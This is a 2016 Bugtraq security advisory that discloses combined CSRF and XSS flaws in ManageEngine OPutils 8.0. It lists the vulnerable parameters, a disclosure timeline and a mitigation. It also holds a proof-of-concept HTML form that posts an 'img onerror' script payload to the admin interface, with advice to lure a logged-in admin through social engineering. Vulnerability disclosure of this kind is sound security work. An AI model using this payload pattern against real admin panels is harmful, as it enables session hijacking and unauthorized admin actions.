[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
CSRF and XsS In Manage Engine oputils
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: CSRF and XsS In Manage Engine oputils
- From: kingkaustubh@xxxxxx
- Date: Mon, 15 Feb 2016 17:38:35 GMT
==================================================
CSRF and XsS In Manage Engine oputils
==================================================
. contents:: Table Of Content
Overview
========
* Title : CSRF and XSS In Manage Engine OPutils
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://www.manageengine.com/products/oputils/
* Severity: HIGH
* Version Affected: Version 8.0
* Version Tested : Version 8.0
* version patched:
Advisory ID
============
2016-01-Manage_Engine
Description
===========
About the Product
=================
OpUtils is a Switch Port & IP Address Management software that helps network
engineers manage their Switches and IP Address Space with ease. With its
comprehensive set of 30+ tools, it helps them to perform network monitoring
tasks like detecting a rogue device intrusion, keep a check on bandwidth usage,
monitoring availability of critical devices, backing up Cisco configuration
files and more.
Vulnerable Parameter
--------------------
1. RouterName
2. action Form
3. selectedSwitchTab
4. ipOrHost
5. alertMsg
6. hostName
7. switchID
8. oidString
About Vulnerability
-------------------
This Application is vulnerable to a combination of CSRF/XSS attack meaning that
if an admin user can be tricked to visit a crafted URL created by attacker (via
spear phishing/social engineering), the attacker can insert arbitrary script
into admin page. Once exploited, admin?s browser can be made t do almost
anything the admin user could typically do by hijacking admin's cookies etc.
Vulnerability Class
===================
Cross Site Request Forgery
(https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting
(https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
Steps to Reproduce: (POC)
=========================
* Add follwing code to webserver and send that malicious link to application
Admin.
* The admin should be loggedin when he clicks on the link.
* Soical enginering might help here
For Example :- Device password has been changed click here to reset
####################CSRF COde#######################
<html>
<body>
<form action="http://192.168.1.10:7080/DeviceExplorer.cc";>
<input type="hidden" name="RouterName"
value="kaus"><img src=a onerror=confirm("Kaustubh")>tubh"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Mitigation
==========
Upgrade to next service pack
Change Log
==========
Disclosure
==========
28-January-2016 Reported to Developer
28-January-2016 Acknodlagement from developer
11-February-2016 Fixed by vendor ()
credits
=======
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@xxxxxx
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad